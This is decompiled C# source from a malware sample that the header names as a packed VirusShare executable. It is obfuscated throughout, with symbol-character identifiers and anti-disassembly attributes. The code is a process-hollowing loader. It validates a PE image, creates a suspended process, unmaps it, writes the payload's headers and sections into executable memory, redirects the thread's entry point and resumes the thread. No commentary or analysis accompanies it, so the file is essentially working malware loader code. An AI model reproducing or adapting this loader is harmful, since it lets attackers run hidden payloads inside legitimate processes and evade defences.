// Decompiled with JetBrains decompiler // Type: ^ // Assembly: syncui, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 8C369EE2-0F8E-40F6-BD9C-ED440A7013AE // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5.exe using System; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; [SuppressIldasm] internal sealed class \u005E : \u007C { private const uint \u0040 = 65543; private const uint \u003A = 4; private const uint \u003B = 64; private const uint \u003F = 4096; private const uint \u00AC = 8192; private \u005E.\u003C \u007C; private \u005E.\u003E \u002F; private \u005E.\u0025 \u003C; private \u005E.\u00A3 \u003E; private \u005E.\u0021 \u00A3; private \u005E.\u0024 \u0024; private \u005E.\u002F \u0021; public \u005E() { if (false) ; // ISSUE: explicit constructor call base.\u002Ector(); \u0026.\u0040 = (\u007C) new \u003D(); this.\u007C = (\u005E.\u003C) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u003C)); this.\u002F = (\u005E.\u003E) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u003E)); this.\u003C = (\u005E.\u0025) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u0025)); this.\u003E = (\u005E.\u00A3) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u00A3)); this.\u00A3 = (\u005E.\u0021) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u0021)); this.\u0024 = (\u005E.\u0024) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u0024)); this.\u0021 = (\u005E.\u002F) \u0026.\u0040.\u0040((object) .(), (object) .(), (object) typeof (\u005E.\u002F)); } public override unsafe object \u0040(params object[] _param1) { if (false) ; byte[] dst1 = new byte[64]; byte[] dst2 = new byte[248]; byte[] dst3 = new byte[40]; byte[] numArray1 = new byte[716]; int[] numArray2 = new int[4]; fixed (byte* numPtr = &dst1[0]) ; fixed (byte* numPtr = &dst2[0]) ; fixed (byte* numPtr = &dst3[0]) ; fixed (byte* numPtr = &numArray1[0]) ; string str = string.Join(Convert.ToChar(32).ToString(), (string[]) _param1[1]); // ISSUE: fixed variable is out of scope *(int*) numPtr = 65543; Buffer.BlockCopy((Array) _param1[0], 0, (Array) dst1, 0, dst1.Length); // ISSUE: fixed variable is out of scope int srcOffset = *(int*) (numPtr + 60); Buffer.BlockCopy((Array) _param1[0], srcOffset, (Array) dst2, 0, dst2.Length); // ISSUE: fixed variable is out of scope // ISSUE: fixed variable is out of scope if (*(uint*) numPtr != 17744U || *(ushort*) numPtr != (ushort) 23117) return (object) null; // ISSUE: fixed variable is out of scope int num1 = *(int*) (numPtr + 52); if (!this.\u007C((string) _param1[2], str, IntPtr.Zero, IntPtr.Zero, false, 4U, IntPtr.Zero, (string) null, new byte[68], numArray2)) return (object) null; int num2 = (int) this.\u003C((IntPtr) numArray2[0], (IntPtr) num1); // ISSUE: fixed variable is out of scope if (this.\u002F((IntPtr) numArray2[0], (IntPtr) num1, *(uint*) (numPtr + 80), 12288U, 64U) == IntPtr.Zero) base.\u0040(_param1); fixed (byte* numPtr1 = &((byte[]) _param1[0])[0]) { // ISSUE: fixed variable is out of scope int num3 = this.\u003E((IntPtr) numArray2[0], (IntPtr) num1, (IntPtr) (void*) numPtr1, *(uint*) (numPtr + 84), IntPtr.Zero); // ISSUE: fixed variable is out of scope for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index) { Buffer.BlockCopy((Array) _param1[0], srcOffset + dst2.Length + dst3.Length * (int) index, (Array) dst3, 0, dst3.Length); // ISSUE: fixed variable is out of scope fixed (byte* numPtr2 = &((byte[]) _param1[0])[(IntPtr) *(uint*) (numPtr + 20)]) { // ISSUE: fixed variable is out of scope // ISSUE: fixed variable is out of scope int num4 = this.\u003E((IntPtr) numArray2[0], (IntPtr) ((long) num1 + (long) *(uint*) (numPtr + 12)), (IntPtr) (void*) numPtr2, *(uint*) (numPtr + 16), IntPtr.Zero); } } // ISSUE: fixed variable is out of scope int num5 = this.\u00A3((IntPtr) numArray2[1], (IntPtr) (void*) numPtr); fixed (byte* numPtr3 = &BitConverter.GetBytes(num1)[0]) { // ISSUE: fixed variable is out of scope int num6 = this.\u003E((IntPtr) numArray2[0], (IntPtr) (long) (*(uint*) (numPtr + 164) + 8U), (IntPtr) (void*) numPtr3, 4U, IntPtr.Zero); } // ISSUE: fixed variable is out of scope // ISSUE: fixed variable is out of scope *(int*) (numPtr + 176) = num1 + (int) *(uint*) (numPtr + 40); // ISSUE: fixed variable is out of scope int num7 = this.\u0024((IntPtr) numArray2[1], (IntPtr) (void*) numPtr); int num8 = (int) this.\u0021((IntPtr) numArray2[1], IntPtr.Zero); return (object) null; } } [SuppressIldasm] private delegate uint \u0025([In] IntPtr obj0, [In] IntPtr obj1); [SuppressIldasm] private delegate int \u0021([In] IntPtr obj0, [In] IntPtr obj1); [SuppressIldasm] private delegate int \u0024([In] IntPtr obj0, [In] IntPtr obj1); [SuppressIldasm] private delegate int \u00A3([In] IntPtr obj0, [In] IntPtr obj1, [In] IntPtr obj2, [In] uint obj3, [In] IntPtr obj4); [SuppressIldasm] private delegate IntPtr \u003E([In] IntPtr obj0, [In] IntPtr obj1, [In] uint obj2, [In] uint obj3, [In] uint obj4); [SuppressIldasm] private delegate bool \u003C( [In] string obj0, [In] string obj1, [In] IntPtr obj2, [In] IntPtr obj3, [In] bool obj4, [In] uint obj5, [In] IntPtr obj6, [In] string obj7, [In] byte[] obj8, [In] int[] obj9); [SuppressIldasm] private delegate uint \u002F([In] IntPtr obj0, [In] IntPtr obj1); }